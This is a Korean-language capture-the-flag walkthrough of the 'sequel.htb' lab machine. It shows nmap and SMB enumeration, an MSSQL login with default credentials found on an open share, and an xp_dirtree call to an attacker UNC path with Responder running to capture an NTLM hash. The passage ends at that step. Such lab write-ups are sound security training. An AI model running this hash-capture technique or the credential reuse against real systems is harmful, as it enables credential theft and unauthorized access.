1. Enumeration
1-1 nmap 실행
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# nmap -p- --min-rate 10000 10.129.12.199
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-16 14:03 KST
Nmap scan report for 10.129.12.199
Host is up (0.29s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49689/tcp open unknown
49690/tcp open unknown
49710/tcp open unknown
49714/tcp open unknown
64976/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 22.27 seconds
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# nmap -p 53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389 -sCV 10.129.12.199
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-16 14:06 KST
Nmap scan report for 10.129.12.199
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-16 13:06:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-16T13:08:15+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-16T13:08:14+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.129.12.199:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 10.129.12.199:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2024-04-16T13:08:15+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-04-16T12:58:11
|_Not valid after: 2054-04-16T12:58:11
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-04-16T13:08:15+00:00; +8h00m01s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-16T13:08:14+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-04-16T13:07:38
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 8h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.60 seconds
ldap 도메인 : sequel.htb 과
dc 도메인, dc.sequel.htb 을 host 파일에 설정함
1-2 openssl 을 이용하여, ssl 정보 파악
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# openssl s_client -showcerts -connect 10.129.228.253:3269 | openssl x509 -noout -text
Can't use SSL_get_servername
depth=0
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0
verify error:num=21:unable to verify the first certificate
verify return:1
depth=0
verify return:1
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
1e:00:00:00:0b:32:65:84:5d:2c:49:13:22:00:00:00:00:00:0b
Signature Algorithm: sha256WithRSAEncryption
Issuer: DC = htb, DC = sequel, CN = sequel-DC-CA
Validity
Not Before: Jan 18 23:03:57 2024 GMT
Not After : Jan 5 23:03:57 2074 GMT
Subject:
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:af:7d:40:c6:bd:96:df:ea:82:ef:eb:b1:57:12:
87:aa:8b:e5:54:0c:cc:05:70:25:86:3a:9c:00:94:
4b:cc:09:18:4c:6b:62:6a:c7:a9:d5:4a:5f:bb:51:
15:34:ac:5e:37:73:9f:00:90:01:5b:c1:7f:44:e4:
1e:0c:7b:86:43:92:a9:07:57:99:c1:06:41:c4:3d:
d0:cf:e1:99:58:b2:30:26:56:bc:fb:6c:70:33:a7:
77:28:0e:01:7d:50:ab:fd:4b:88:fc:83:d3:fc:30:
f6:8e:77:14:d1:47:a7:70:92:15:56:74:80:ef:21:
eb:e3:7a:0e:e8:59:36:b0:1b:b3:05:11:7e:1b:ec:
11:30:2f:fb:8d:45:86:6d:c8:51:eb:7e:6c:cf:04:
be:4c:a2:fa:c1:6d:9c:d4:e0:09:e0:82:7b:e9:7a:
22:cd:75:e9:ca:f5:77:29:d8:82:03:af:c0:3b:87:
bb:85:b9:0f:b7:a4:26:d7:2f:d1:25:fe:f1:20:cf:
10:23:ae:c5:21:7f:67:ba:9f:13:40:5a:b3:59:48:
55:cb:1d:11:2d:f6:e1:64:85:35:94:db:a6:68:6b:
ae:f9:56:3a:b4:5c:dc:bb:27:ea:d7:01:98:94:e6:
ad:de:0f:82:aa:fd:28:8d:f9:90:c0:c1:62:76:d9:
71:89
Exponent: 65537 (0x10001)
X509v3 extensions:
1.3.6.1.4.1.311.21.7:
0).!+.....7.....v...V...5...Y...5.w.!..n...
X509v3 Extended Key Usage:
TLS Web Client Authentication, TLS Web Server Authentication, Microsoft Smartcard Login, Signing KDC Response
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
1.3.6.1.4.1.311.21.10:
010
..+.......0
..+.......0..
+.....7...0...+......
X509v3 Subject Key Identifier:
09:56:E0:66:9E:25:3A:61:B0:B3:5C:FB:6C:FD:C8:9D:F4:E2:1E:23
X509v3 Authority Key Identifier:
62:9F:32:A3:A0:F0:38:20:D4:60:C0:CD:6D:C5:FA:51:30:5E:C3:15
X509v3 CRL Distribution Points:
Full Name:
URI:ldap:///CN=sequel-DC-CA,CN=dc,CN=CDP,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=sequel,DC=htb?certificateRevocationList?base?objectClass=cRLDistributionPoint
Authority Information Access:
CA Issuers - URI:ldap:///CN=sequel-DC-CA,CN=AIA,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=sequel,DC=htb?cACertificate?base?objectClass=certificationAuthority
X509v3 Subject Alternative Name: critical
DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
Signature Algorithm: sha256WithRSAEncryption
Signature Value:
2b:66:89:55:b3:83:17:ed:d7:43:ce:46:7e:5a:dc:3e:d8:71:
20:b0:ec:95:9a:09:7d:fd:77:50:bc:3d:21:04:70:15:ba:f9:
c1:5f:ee:b1:04:7c:59:77:e9:e0:51:96:07:b8:3a:17:7c:38:
bc:ea:3c:5a:79:b4:79:37:10:33:e3:76:47:2d:da:11:68:af:
f5:21:bc:fd:59:35:f1:9d:6c:49:4d:a1:ce:54:dd:65:b5:49:
5a:06:70:0b:23:ef:62:85:74:da:e3:e4:3f:5d:9f:f9:9f:60:
ae:84:53:b4:e1:01:ab:40:20:74:c0:dc:e6:16:7f:03:c2:24:
9f:d5:2e:72:db:e4:5f:aa:a0:c3:ea:1f:c9:5b:de:22:ab:04:
d0:62:fa:0c:20:c6:c3:a8:94:99:72:20:54:99:39:7e:04:27:
7f:24:2a:ba:a9:e6:85:59:c0:f0:da:17:5e:e8:74:8a:84:c7:
98:2a:98:ad:db:48:70:1f:0a:0b:89:d2:ef:4a:77:79:fd:85:
d9:f4:cd:7a:3a:ad:c3:8e:8c:d3:85:59:43:0f:fa:ed:8f:bc:
de:12:39:23:57:cb:0a:1a:d8:16:d3:e4:de:0e:49:1d:a1:f2:
20:4f:5a:63:71:14:99:4d:c4:1f:64:8a:85:14:a2:e5:1e:86:
24:17:2d:9b
흥미론 CN = sequel-DC-CA 발
1-3 SMB 검토
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# crackmapexec smb 10.129.228.253 --shares
SMB 10.129.228.253 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.253 445 DC [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
아무, id나 및 빈 password 입력 시
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# crackmapexec smb 10.129.228.253 -u test -p '' --shares
SMB 10.129.228.253 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.253 445 DC [+] sequel.htb\test:
SMB 10.129.228.253 445 DC [+] Enumerated shares
SMB 10.129.228.253 445 DC Share Permissions Remark
SMB 10.129.228.253 445 DC ----- ----------- ------
SMB 10.129.228.253 445 DC ADMIN$ Remote Admin
SMB 10.129.228.253 445 DC C$ Default share
SMB 10.129.228.253 445 DC IPC$ READ Remote IPC
SMB 10.129.228.253 445 DC NETLOGON Logon server share
SMB 10.129.228.253 445 DC Public READ
SMB 10.129.228.253 445 DC SYSVOL Logon server share
일반적인 share 가 아닌 Public 에 대해 좀더 조사 해보면
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# smbclient //10.129.228.253/Public -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 20:51:25 2022
.. D 0 Sat Nov 19 20:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 22:39:43 2022
5184255 blocks of size 4096. 1467337 blocks available
smb: \> get SQL Server Procedures.pdf
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \SQL
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (23.4 KiloBytes/sec) (average 23.4 KiloBytes/sec)
Public 에 대해 패스워드를 입력하지 않고, 해당 공유 폴더로 접근할 수 있으며,
존재하는 pdf 다운로드 수행 > sql 접속 방법 및 default 계정에 대해 언급하고 있
위 가이드에 따라 mssql 접속 수행 impacket mssqlclient 활용
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers/Responder]
└─# impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@10.129.228.253
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (PublicUser guest@master)> select name from master..systemdatabases;
[-] ERROR(DC\SQLMOCK): Line 1: Invalid object name 'master..systemdatabases'.
SQL (PublicUser guest@master)> select name from master..sysdtabases;
[-] ERROR(DC\SQLMOCK): Line 1: Invalid object name 'master..sysdtabases'.
SQL (PublicUser guest@master)> select name from master..sysdatabases;
name
------
master
tempdb
model
msdb
SQL (PublicUser guest@master)>
추가적으로 진행 할 수 있는 enumeration
- DNS zone transfer/ 서브도메인 brute force
- LDAP 검토 (인증, 비인증 상태에서)
- Bloodhound 를 진행하기 위해 계정사용
- Kerberoast 를 진행하기 위해 계정사용
- Kerberos 대상 username/password Brute frocing
2. NTLM 획득
2-1 NTLM hash를 받기 위한 responder를 다른 kali 창을 이용해서 띄운다.
responder -I eth0
2-2 접속성공한 mssql 서버에서 디렉토리 조회 수행
SQL (PublicUser guest@master)> EXEC xp_dirtree '\\10.10.14.13\share', 1, 1
subdirectory depth file
------------ ----- ----
SQL (PublicUser guest@master)>- \\10.10.14.13\share: 네트워크 상의 공유 폴더를 가리키는 UNC 경로입니다. 이 경우, 10.10.14.13 IP 주소에 위치한 share라는 이름의 공유 폴더를 참조합니다.
- 첫 번째 1: 이 매개변수는 xp_dirtree에게 하위 디렉토리에 대한 정보도 반환하도록 지시합니다. 0이면 오직 지정된 경로의 최상위 디렉토리만 나열되고, 1이면 하위 디렉토리의 정보도 포함됩니다.
- 두 번째 1: 이 매개변수는 파일에 대한 정보도 반환할지 여부를 지정합니다. 0이면 디렉토리 정보만 반환되고, 1이면 파일 정보도 함께 반환됩니다.
